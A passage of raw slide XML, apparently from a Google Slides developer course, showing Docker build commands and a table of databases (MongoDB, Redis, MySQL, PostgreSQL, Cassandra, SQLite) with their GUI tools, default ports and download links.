                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker-compose build nextjs</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>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282"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1353400"/>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1200"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="39285"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Note:-</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1746" name="Google Shape;1746;p282"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="2575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t/>
            </a:r>
            <a:endParaRPr sz="2300"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2300"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2300"/>
              <a:t>docker image build” read and build the "Dockerfile" file</a:t>
            </a:r>
            <a:endParaRPr sz="2300"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2300"/>
              <a:t>docker-compose read and build the "docker-compose.yml" file</a:t>
            </a:r>
            <a:endParaRPr sz="2300"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>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283"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="140650"/>
            <a:ext cx="8520600" cy="64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520">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Databases</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4520">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="1752" name="Google Shape;1752;p283"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="168150" y="842525"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{5F29EBE2-DF6B-4956-BA54-5617D0952659}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="594700"/>
                <a:gridCol w="1183525"/>
                <a:gridCol w="1290750"/>
                <a:gridCol w="1558875"/>
                <a:gridCol w="1558875"/>
                <a:gridCol w="2607650"/>
              </a:tblGrid>
              <a:tr h="551650">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en">
                          <a:highlight>
                            <a:schemeClr val="lt1"/>
                          </a:highlight>
                        </a:rPr>
                        <a:t>#</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:highlight>
                          <a:schemeClr val="lt1"/>
                        </a:highlight>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en">
                          <a:highlight>
                            <a:schemeClr val="lt1"/>
                          </a:highlight>
                        </a:rPr>
                        <a:t>DB Name</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:highlight>
                          <a:schemeClr val="lt1"/>
                        </a:highlight>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en">
                          <a:highlight>
                            <a:schemeClr val="lt1"/>
                          </a:highlight>
                        </a:rPr>
                        <a:t>DB Type</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:highlight>
                          <a:schemeClr val="lt1"/>
                        </a:highlight>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en">
                          <a:highlight>
                            <a:schemeClr val="lt1"/>
                          </a:highlight>
                        </a:rPr>
                        <a:t>DB GUI</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:highlight>
                          <a:schemeClr val="lt1"/>
                        </a:highlight>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en">
                          <a:highlight>
                            <a:schemeClr val="lt1"/>
                          </a:highlight>
                        </a:rPr>
                        <a:t>PORT</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:highlight>
                          <a:schemeClr val="lt1"/>
                        </a:highlight>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en">
                          <a:highlight>
                            <a:schemeClr val="lt1"/>
                          </a:highlight>
                        </a:rPr>
                        <a:t>Links</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:highlight>
                          <a:schemeClr val="lt1"/>
                        </a:highlight>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:t/>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:highlight>
                          <a:schemeClr val="lt1"/>
                        </a:highlight>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="588200">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>1</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>MongoDB</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>NoSQL</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>MongoDB Compass</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en">
                          <a:highlight>
                            <a:schemeClr val="lt1"/>
                          </a:highlight>
                        </a:rPr>
                        <a:t>27017</a:t>
                      </a:r>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3"/>
                        </a:rPr>
                        <a:t>https://www.mongodb.com/try/download/compass</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="588200">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>2</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>Redis DB</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>NoSQL</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>Redis Insight</a:t>
                      </a:r>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highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                        </a:rPr>
                        <a:t>6379 </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4"/>
                        </a:rPr>
                        <a:t>https://redis.com/redis-enterprise/redis-insight/</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="551650">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>3</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>MySQL</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>SQL</a:t>
                      </a:r>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5"/>
                        </a:rPr>
                        <a:t>W</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" u="sng">
                          <a:solidFill>
                            <a:schemeClr val="hlink"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>orkbench</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>,Adminer,PhMyadmin</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en">
                          <a:solidFill>
                            <a:srgbClr val="202124"/>
                          </a:solidFill>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                        </a:rPr>
                        <a:t>3306</a:t>
                      </a:r>
                      <a:endParaRPr b="1"/>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7"/>
                        </a:rPr>
                        <a:t>https://dev.mysql.com/downloads/workbench/</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="551650">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>4</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>PostGres</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>SQL</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>PgAdmin</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en">
                          <a:solidFill>
                            <a:srgbClr val="202124"/>
                          </a:solidFill>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                        </a:rPr>
                        <a:t>5432</a:t>
                      </a:r>
                      <a:endParaRPr sz="1600"/>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8"/>
                        </a:rPr>
                        <a:t>https://www.pgadmin.org/download/</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="527700">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>5</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>Cassandra</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:solidFill>
                            <a:srgbClr val="4D5156"/>
                          </a:solidFill>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                        </a:rPr>
                        <a:t>NoSQL</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b="1">
                        <a:solidFill>
                          <a:srgbClr val="202124"/>
                        </a:solidFill>
                        <a:highlight>
                          <a:srgbClr val="FFFFFF"/>
                        </a:highlight>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9"/>
                        </a:rPr>
                        <a:t>https://cassandra.apache.org/</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="527700">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>6</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>SQLite</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:solidFill>
                            <a:srgbClr val="4D5156"/>
                          </a:solidFill>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                        </a:rPr>
                        <a:t>SQL</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:solidFill>
                          <a:srgbClr val="4D5156"/>
                        </a:solidFill>
                        <a:highlight>
                          <a:srgbClr val="FFFFFF"/>
                        </a:highlight>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10"/>
                        </a:rPr>
                        <a:t>SqliteStudio</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:t/>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:solidFill>
                          <a:srgbClr val="202124"/>
                        </a:solidFill>
                        <a:highlight>
                          <a:srgbClr val="FFFFFF"/>
                        </a:highlight>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50"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="5143500"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="9144000" cy="5143500"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="262" name="Google Shape;262;p50"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="9144000" cy="5143500"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="297D3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3" name="Google Shape;263;p50"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId3">
              <a:alphaModFix/>
            </a:blip>
            <a:srcRect b="13315" l="0" r="0" t="2834"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="442500" y="263362"/>
              <a:ext cx="8259000" cy="4616774"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
